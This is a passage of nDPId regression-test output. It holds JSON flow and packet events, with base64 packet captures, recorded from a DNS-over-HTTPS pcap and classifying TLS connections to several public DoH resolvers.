B5bwOJqseO8f5u7xOkvAJgvo15UUiFg3Fs2KF6ThIQ+YMon+lnrc8ic+qxARfjEb0cUl2zxPZdn9Pk3JDZvc3FGGanhfOsuSbbIvGq9hrnu1dWnHdMIQG0tNqt5ibv87oqeA73DYcjrRkRvnmr+NgiyzjsYvnZnavg2SVhWLOyeYi6z6452amFOWjGib+uO3a6rOPS\/dTZTQ6OPLUcWKxkXHJYeC+Yo0LWKJwuFiHg7pi2FgUOZ1c24VzSrIDORj9fOesNSZQSAFwMDARkW8VkjAKLO1iVO3Z32JB1I03p1Xf19NsjcozTvJTA7tEC3r\/iX403MlEBRFX3aGlXo2cYSoUTLuYUpZWzaPV43zoko1HlYoj3YCwOBNXEdg1n9iG9nfj9q6\/IWDsPyy9SboWjcQJVD0zE5qJ8DwGucAIvsQ7D0zCtLvnxWjjpqSDdb9tOBYDpaZBZU8KCwR8LHjkKDpJkQyCpohil6861j3biEmWgZIX0h067Jmu+\/GI2jSqgEcF0VdDgb777Odt1jnDUv6rPpys\/KpOKpGwd1sOOD1atUuwZ2VWxJpoQFOVZofLGtGDAGLonrwSCzj9\/ObIFITDrXAwr6TE8\/SO2citlABmWDWJNFMQq1IU16fmzPW9wZ2jhYPxcDAwA1KFs5Si96rO1Ec9S06xPPSvxONjZOZ1eDJyi5V7B3adcTvi5GDWF42J9ne7Y2tNbnJdDWBMM="}
01090{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348407,"flow_last_seen":946739348519,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":3384,"flow_avg_l4_payload_len":1692,"midstream":1,"thread_ts_msec":946739348519,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":946739348521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739348521,"pkt":"REREREREZmZmZmZmCABFAABoD1xAAL0GdBEKAAABlTjkLYysAcV+b2UT8dMaQ1AYAfU6fQAAFAMDAAEBFwMDADViidEmWrIRj1bupCYNTHJ+IR+sbSf6KT90A8qW52RQBURyQL9vFT6E9CFjlI93BJu2cr+zKg=="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":946739348961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739348961,"pkt":"REREREREZmZmZmZmCABFAAFIPztAAL0G074KAAABLZm7YJSCAbsJfFJ\/n27j2lAYAfaq8AAAFgMBARsBAAEXAwMZV\/YJsl1KDGHp6vinUuSzBgwYUj7HikeN2yT\/6PXJXSCCG8AdBIamvVFUtiPCGd7atl\/XGLRDF4fN5wiY+j2o\/gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zc2UuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AILqIx\/2aPwjQ+1CtVREnVkbTOyfaXxjQI4MYF1wNoZlj"}
00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":946739349012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739349012,"pkt":"ZmZmZmZmRERERERECABFAAuAVvpAADYGOMgtmbtgCgAAAQG7lIKfbuPaCXxTn1AQAIO1KAAAFgMDAHoCAAB2AwPVEzRRR6mT0E92uybAnGbGZWeWVD\/m1\/eNOhfsedWm3iCCG8AdBIamvVFUtiPCGd7atl\/XGLRDF4fN5wiY+j2o\/hMBAAAuADMAJAAdACAZ+iIImd19O1rP7adwYQe9xC\/+1jN6jL9eBLofHG6SbQArAAIDBBQDAwABARcDAwtedm5F60tr1KSpSWgXMdmmX3Ys4sUEWudZbc\/GVmqkUsaepFDQQ8mcPIjegsJEHlTqywqGyBqt0c8EFI9PK3y9wMc\/+3ozr1s1L0Jd42MTaMhOndcbb8aYEnSYi\/zIVpLn6qdOkfyxUEfDDwQC7tdpz8rWkLOD8s1Gc\/+GapP01LuZUSoxJKMEPFivq1rS7ax5uSaTQJul+x0Q1A7WKBQI96lxNlKhu8S\/F6aiQdLb9bng9LygmgdlJ0IMNTAzSle754kwT44x6hxHdY+dgL3FfpB162mfDfNtflZ3mHhPTnkpYtlwwqsdseLzRBUZP3Q4Ja18aDfnLKv6lwZqUkYqVbKbxYZxo1iV+7HgYRo00AC9h97+\/fjdDvQp1\/ZlgGZVor6fI\/2UbNyKd+CKXq\/WxiWd3cfOC5mfsohQgZfh0mCkf9dr3uz3ujKCV4y2skvjk\/nvMYWaCk8YYJ09fpkBhHkvDLX34BQkxdq8SFFlf9KC0xLeicU3h\/prF3BxKbFcEuJVsTQ1IwCvvKPttu9bXK5Pot+r5ctGacxaL2PbnIguGLNO3oXuqP1Q9c+9bIOgs3SrVqvTzY6u7z71LwLT4lIRUT1tdFuzNBsI3uP36b\/9IAg3kdqQ6B86AhSq6s9YI9cVyIl6Ij\/v4hTBVX3z6+HeVN1ZOCnsTQ5pzdsr1wh7Urw2Dq8ujiDkOD+Fou6dMOYoID0SKEwKKw1eszHLhxLaCFy\/r3d7Go4MVMtt3WT79fbDbeLxIVt3hgCghutkKtcuHd5chD4oLWELh6tM9hPl+4nCK4m\/+O5cbKg6OL6jCTY\/gO0DykmoFGAjlffWT5qFPKGIHd1y6jfLFBTeg895J4XJsRYeS8WWpPvi7T\/OrrEOEoSups8MYg4y47m6jBSiviaU3Egrqb9OmbARusmAkBOc+b7sPEV3vJ7rmbEmSmp9es6Ma1hTLKZ1zLv5y87EpErdv2GmabDERgys3rQli1zICByjjT3wKTtOmnCFVus\/kEZ20ZKIT3R1SBoRFrSMK3NkxEq+liNvGGcf+EHNQ14qDPBLs0m+Amz59cCkIeFxK62ZDg\/D8+8JoEQZlyE9AWaFti+8vDVxBObTHdc9i3Kw7ewteJw63QBC9EWl8n8clagy9wb+UFjl1FNsicAfIiO1Xs\/Zye+Z2EVvEt6aOGsYYXUIiuSHHHy+OTANd5q6FtSmxH5d29V\/RRYtUF+RFNqvu7jCJbpfY4CMi\/uFQpCXgIsM\/FuZw9ietB43gXYBJPigmUjQOJrnl2aOEVZN25twSZkyFkDyfGhTbcdXECqNFF8TnC98sE4z4cSyaAj5eIgD8KWiILJX2yoi+dB+VLGxM9ljCfyywhEqQD9FxwMPenX20RdEq43Qg2oM44SbTOcaPyRK5R1+UoArEareBxTtwbIj1\/gYPRWTkZ8pK7ELTpeDzq5dz0ptJVwSUIH0JdKkVE3RFHc7LCdWysSVUeFYgHXl28Deq1y2qizxSTQTQGj788zPkj9nRqwsew3ffxErP0pR2erOmxzmRPzUcbJ79H2yupuK1CFndSabVcPzkp0n+2KlKx3Rn8tyf\/hn5qm64LAaVaGFpUoNBQQlUEAUYg9kdMVxRV9nD92+mrKa+2JReRncweAA5LhgzrfrEPwyc1B\/FBpBxwIyV7Xy5RQehy\/n+t2tqgDOZsROSPZV\/c502uShsqQ80dFUM5RKxh0mzHQFM0OK4kAUJhq4wyFBHR892ibgw3EufqDFUX7y2fDW3v9sHJ0PjEBQf0Z+LPQlMJXmUS7wgfHtNIgpjboq9\/XXfFayEzII5Ncg7bWrTiyo4JZFWiVHcfds+TlAJ90V8nR81jNjJjiPpWGiw\/wBoLReBkDgcemdC73ykLweu4Hz14TsLOSuTZsu5EZr2HV10q+61hH6ogeRQcst3XaFzwE6kceLYfEcwH6tnp0hMB9x62cNInT6JQ8Ps6Dsa1MRUtnCTsYL1E0KIBY7R9nY7dSZJpv6\/qCWpPnVEfxATo177u2nsXiV3PW6LNV3vcyinTzbbKWNsqHSX\/Rxrwf+OdHXgpeBX43CwbB+Rl\/n0BchEVnzKV702Gf9HUv7cdBb0q\/i8hYFIFBzZttYWXxvMMCuX5vFFfZ+rdfdvsqESgmVU60GNMEWlpOcj4wiK5O4Sufp7t63lXuXFEGAyK\/zCX6bTsoTK5InJmYeoxH7z6vro\/3e6Rs6NXLtea8yb94qYkPEVBEqGEipZDsyb\/R\/lWwE43D7Aub6g9hkVbl53hLJGZnLMYjNGkky7jnCfZMKDiaQ3bMKv84lVUSDkp3sK9qeuBF1mmZVLhv9HAxir3SYBNQzWsBGcCUpO9xkV8FP0kj\/iTW\/FfLKk\/DKd+BUjaxMV2uhSSQCmVokip5q8tl9J4DEAniFz7fyP2MXZu9ul4s+9NyHUnr96E7oyJz9targa6lIbTNrabDpef+RQ95Jg3dEACMFcNChtfiB\/b3jxW+VTLzdeEUKMhmN9RiB66l3ilE2UeLuKgX3mDdaXzGma9QHxu929MG9uV3gmQHGDy5TCH2vSSxC6z2\/OmzDacBVelfY5Epw7lZBVVGZZnkHXtDZ9aRkPwQ5ycPlis7xyXgrmjnzVXCU2sPi4g8aIZETiD58CL1o5eQFVuuBNN+YXqwNw72pWFPr7n1hEhwv6Vw12CTiC6plOVTlmWo7Hq2\/pHWhiu+RR5lh+vtYdVwTRC30+fnyRct1ka9vbNMqvCrrwxYa5D5R79sdMZcHtogzlIhlvBA\/hEtCrwDCOTsOVV\/YHdG3yKWN4O6RFwnZZifYo9t6777XaaqBBnRbmAIh24x\/s0cQdV+c5CkmqhwnyVXuFfH9t0XQ1553XL2pziV2ZWgjNschuXZ58zhktYtAMF0VjgYyEW7jDxhCpc\/J+cRaztT52A0ytvkRgmQaVyJn+aLdW9sCq3AlQ8gfIfMUsOa4qrrfYi\/W6wC7p\/JpUVApLzH2mKuhH3cCajbIykaOD4hdj7uAYv5ROV\/V+1+PXMG5ia\/9hbHOgDJFO9d9IqY7KSn3C+1mBqumfNrcdhFQFiTH43iJKL7gLi6km2zN5cYKZjrmjbjv3JkWSUwYRpPDfBjgX5JiTKnp6do79w4bx6CpetzdKmLMsuX1smdlFu3kujpvbqv6a1KH6F4pTm1MQ5RJmmfgdquxg6OsIIvP\/kEDn+LVg8ZMm87yYyquFkOWwe1Uj\/Vi3kL4fPIR5niD5XVoEWohLwDdVCqKts+2P1GYyEHqQAMrqWmQegZl\/LhTQw4INPlPDFEm0yb+KBOh00ktbHzCM3CFPGnzYO3alldd67nq954eKLkUOGB9MeSY7cUwdbulO4dr11zq3CmOecqOMxOt2f\/VIopIebzlUenef+vRdxbO4ewVSqUhsy+yoPWXBOpZPgLhhY3LxBP7ooDeCCIO0lcZB\/CBSyUEgiFK4lZ3kAGz8uFt3A\/vRHHEykEvXspKCwmakvQLGtne7shF+m0j\/3K2vxEjTMcnD1pU47tDCPXW32n5d+GKj1kQXvMBCTdCNuO1i0NSTDkuKc7j5+f6O6RyusC0fFzTP7MVdbXFBb1omPMQEuUSj0+hj0rK73sjeV5xq8OVFpFoURjJ2NwQsCAu\/jAm112150nTKknyPg+N6HqbvoOC0Wpkh7IwnBnV+fSTZjZ4AEkEeoKm"}
00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348961,"flow_last_seen":946739349012,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739349012,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":946739349015,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739349015,"pkt":"ZmZmZmZmRERERERECABFAAC4VvxAADYGQ44tmbtgCgAAAQG7lIKfbu8yCXxTn1AYAIOAngAAUbudk7Sx467B78RwxwixN7WbszxDSJth5tiFKuiBrGoB9KFJtYBVt1C9rFJk5PyiCKlQsUVoHGHAH28fXEOq226wLx4N\/Z5eAHXlqMB6V1mSenxLPr5ItjgHCvxui0hIr8CHs4BD\/dcyFi\/lJAfYyCLIMg195o3ptTftZf8UL\/yW+5j1eIJyx2wYxG1Bmojg"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":946739354159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739354159,"pkt":"REREREREZmZmZmZmCABFAAFFsX5AAL0GP4sKAAABuetRAa5gAbtwXMMeYngARlAYAfbM4AAAFgMBARgBAAEUAwPEqi+8SizamcFZuiOMoqnZy7ZEtN03UH+nij+VYBL3GiAFdLPwuVYC1BfptVDzpRdMmd95Dbs0SjTzk4T9Cfoa3AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmRuc2xpZnkuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIAlFpvTRrkboC35Gi6Kti1ZQzFT3L63Tg7Ad2VS1Z0Nh"}
00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":946739354179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3168,"pkt_l4_len":3134,"thread_ts_msec":946739354179,"pkt":"ZmZmZmZmRERERERECABFAAxSLpJAADQGQGu561EBCgAAAQG7rmBieABGcFzEO1AYA+rX7QAAFgMDAHoCAAB2AwNebHWZixx0UeVpRBPFfxfOwpvxbfyV+ENeQi\/Un6YmQyAFdLPwuVYC1BfptVDzpRdMmd95Dbs0SjTzk4T9Cfoa3BMCAAAuACsAAgMEADMAJAAdACB1L93FSUikFZRCKYl+OoNXGHhZBDYuCiNIjz\/6VCChXhQDAwABARcDAwAgdZlJOwY6+pChCwvT27tLGZnet+yerzqND\/r13r3OLdQXAwMKE5aV9MRHEDXFawxN2Z6ZXTlxr30g5cib8A44fkQ64oQQPk\/j2rM6co+1b6nblkLeVstFbtdteXwKa840eY9TBhZcpregM8Gpq1oOWaP3aNoy3x0m7PtgdMXWTRJ7rBzMj95YpQgnRNENvlH3xRXTNJuz0OfawrfLZMK40dTY8qdEtSvVWaOv58OBFTZzds8x7Jv0lUMqTicPkVrWkLGPasMnh+a2IVbs4dzr6AhsFrB+RZ1Cwi3B7S6zzr3HKx3FQGuVtHh19izb6w3PsdZ173iclTsS5Bteswb+0EdgltfMU7tCCWlZhlMw5cbiqzX6GLMdzRL4kMNW6gZ94dTc92SBIwy+nEoGbWZhqTeDuHiAUARf+gliy5YoFjW\/PRAypf5PMRtEZClIDkjH3prUoCFGtLR5uf4Ro0aKo3ih\/KCyAGbVEIvG4bDrcfRxO0cIiVz1g0D8AUPbTDsJO+EPspEYZgIriHIBYFx\/k\/flIHH3EjcpqIe+X8XzMf\/XqWL46qAhN1cBUZXyVc3ZIhpeJ7ZcaAbPdH2pnTMTM+2Go4igirnaKWq3AflEDkSSdueX+UQOyAZUkd6Z\/x1Mwq9Tb7hXL6vtOYcRcpywMzYkakngWETbQss0CojZbN6WAPS\/E+Yya6CgGI5Mt3dulPgu8jNdumumeB1P2glp9qwQHuvHZ1QS+cPtS5x1raYCp7T5sLegZ7EBanNjOEnVAU4IhPuW0ciFUM9Mj\/BzgDWE\/hUdNhPhhQjiaUBq7VyAXKWvyO4Dx2Fel0gu0u32uA\/SHIYv4dBAj17ghhBMv+sGNC8NMtNWhv9aqIp0FgaNgTJ0u6ZahzAQoaba8gKEvhS9MXrxWiCXAHjt1VsuslTiTWmDXRn19O8C7v9DYdY\/x+ZHYaRltrJ+iDZDtT011nG9MjUMy2gT88psevKL0b5pLEr8mJZKye0N3pZbPCi7mofLMsInUgCJYAIJe6z94EV17S9g5MdytiaRjgrDRHDrubquER\/+3IoTeZlSES8Dx7zlXZ1xB0O+hR5nXJGyIskMCiVwzAersZ9n8hiUAXpNADMi79ZOaHWxepo2ogdjtLk6L5RJOzsW\/4O9s\/bE+P+1smYJ8Xz\/vrKCk0smpZMpgO1UV8s8gCIdy3Fy602DcQY72cCEk\/bea7v72CbMggpz6myeQuHNx9T5ZrAHxOyDqp4pkMAhTfD0dC3xg5zkOkSQr5pJx6ievuDl8+wenRgTssVF8J1H1XRwU56YwKhMsgqTn8eD+cywTh5zCo9dNvl9ZfHWmV3Mdg4aJz1dYzmdkUhSu46Md5G4HmOnLwI\/XQbyhHcZ2WUU9mvD9BvjP9kn2RjUXcRT+d\/cwjt2Esxb2ENHpq2bs5raN\/CIbWH\/kUQRUUCpYL9CdmiBZpRtJPrOXy6iWAKofUme88d2tr7pTpEzcTLRU5BoYhPgOVQbcXw1q3yaTUVQB4Wvp1Zu7ruywhz7ujDaUupe4ypGeBHoMNq\/GonbnedBdKUd5q1Hau\/cYgTRejjU\/rutBsmd1TsWFTtw4Narsizl07q94yxV1+nrTG1gDq+RefJI3JM3SA8ccXZmrC6\/9FsgFjt+2cDWt4JB10cFksHu2\/ml\/dASyc2jx2disClcngjvd0YpBOF1xYxILWWqUHc2SCZLZ2Aroa1pMW21jKFGB4Ar1xpSSuVVcPsSSozoKj4\/j0FvDgtwJoY1rK5ezs7yUOh0iG7\/TmlCa9VwcqKlbka3ucK+EV23eB8BAhdfkU1ZRvrzop+h56cTHnAqdzA+huEFkYic20FxEaceaf8SUoyM1\/uxur0377YEwqxCUCLmkpdjf2hKaG2o6w6dX9vCExiNhM2Jlol1IlMb4fWmsojPIiIMoMr4vCBzw+JJJUMfUwOy6sleF+nP5muuQ5rVTMwbb+OCuGE2jDpUYai822DbFN3NNQkq3i2+StVf9WCISeMMwfPk+unXE38SgIx+97\/gooknQY70IX3TsgQKFcc1SEcM6rgwk5pR4rwHfer1xQNsM1RKZGf8xeZa+ag2yg\/IxDT4LymayHchHxdaigJz4AcxjPrNuXaoi2s3E1xPh2H1clb\/ZJJwrzY7BZjc1TQovWjOw6wm8GHMHRYPWaLpFhaLJX6iixp0BBfYBFzNmIvcsaGPhpGQIWG8LNHl1vR+XYpcJzMWemerQw5\/TiIwzhe4xLQ3Ee69tOX2fKhT1GAVUyB0oeuLgjlb0FpWzQ\/lyORIy\/GJNnRuRgdZy8RNv03eZWNeLTHNU8amNvoSqoCJx28QcG4ZFWjkiBlGlisQg9MS7LfxB5YDcM35ukvbr57gX64nw00G3GJe5JnYnqeIHNIuWQI7nvVvBHP3PfWTKRa21nyK90D70j+bxIjA68ylRrcDSlrq9zK60l62NWR551fMFXxuoHTFc7qQ+K4J0ESDuqw7x47BFgsRGeVuVNYexUC0TU1lBMwcu9BGg+0G0+duPvOP3aW+jzZAhqEMopcx946w0BTw\/+bJ5qiZX+nSvNF+IzKPfnXq7G+okmmjpg\/ianwcwtjvgrAC4pnZGY+m\/27CyJiTEi9fYvN2T1KGpFt19LfH\/UKHKmZdKRHhHpgpAUwyz0ixR7JCGsZBCNp7SmZtoObLBfKyYFLS1OdeJn33VC7QU5ZIB0TIGMOnasD1IIceFavDDD1uWjFat9U8TSvdQkrVOP0H+iiog+bscrfkzNeLsrOj5JaS96ZDARUESAXVBQE+wq3Z0J6WrNdNJCanh0R13lIIfbBO3tp1JQaYJcU43NTOBatEStIgR6pggN4HF+DO2dNPqB6DJlllwkNWiMSwaSg\/Qokswn+fLJvn7pPXb8ILKczNLht2jz9aEp0+I8QfJ9sljCRmG\/qdZknc3MVkUZCxQWgeYvnw16OCgKVrO7aXg97ZXgFQywgIz4XcG4cQlmlUgZ5vBckLpEq1wb47O2DC7oYeIkB7WvMn7pIP5qKMmIewtCOip18QV5mNZQ7kfdTHrJyhNEAXbfaMkBbJyAVJGCBIYwvhIF13Izb7B6Cmnolxq1r5eurWQOB44xUuJop6m5Nm5hxmATag\/xOQnBP8r2vNMxUihmUT8anHH3UfjXAY915xtFCA13IdATjUK5r\/nOjWuYELtJmgRJ2oeyJFl+xU3enOifKqvSW9w3npBMuO6+ND+s2KXgdXZpDonBBs70SsK8NzgIT\/8A0se3txfhbwpY2EseDOLiVbMtTN8WhjrhnZpDEjzwdCV8jV8ki7+xTW6Ae32nBN9uRAZ20gpXPNrrgk+1oPaXal74NAuojgux90nmy7fGQvJ\/CCkJUFP2+xt7moAmNV6Bvh9GIV51tdhbag9+AtGmBI8WUGXz9QPwduT4nOO+Ia6cTJuP1+CL3tb+p6ijB1Jg583CQ8vtkm3Pw8NXcvYMcBOIpsKkRrBsD67+irg6nQFwMDARkSIsFlIX96rBVOSHF8j3nD4OzTmAKQfrZ20qhfNZw8PH0q41dWeUeDXwstCBpDPbSnxrC2ED\/1S7AKbK3628b0BuTXrCb9vI9IIN\/fjnNzXGCyCTfNGyQC7Z2s3ZZgGilAyQTgWS6IBv0X\/cXimIPEtNGeEgUfHp2ZiHChqtgUwdJbYZhYRpk9Vh4PP\/G\/geKDMJuF9LkfMNZa2A5\/kJwnnbAN+9JGdzxyQUZGqq8DCQqxQ4uAbnIJmcLNJBx9PHCzhhj8vk0E7hUaqEkvClX1iiIhNhFlmQ9FsqBvx5KYUvaVI86YI314BKZUdBn0Gn9Psqh3g3PCqYbuhSA+KXAHAB6ifkPpQbZxhpKA+yQN\/aKxaWBvyR8fvBcDAwBFUlHyM0i8aQGJ+PRPScWQmM6JruXTVxzLP2v5t10WMRjAfhtdK+kbZwmOwuBqS0fXovjROfDM5rGu95fh\/DYXUBWZSAER"}
00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739354159,"flow_last_seen":946739354179,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"thread_ts_msec":946739354179,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":946739354182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739354182,"pkt":"REREREREZmZmZmZmCABFAAB4sYBAAL0GQFYKAAABuetRAa5gAbtwXMQ7YngMcFAYAfXMEwAAFAMDAAEBFwMDAEWXq32pwHEzhcGDp\/NKLjvxgMAkksKxKcFIOFCDodEb90S6h8Gu0G\/BLuFfZ5sttQB7HESBT0tBjYEfHL61VthvR6QOjls="}
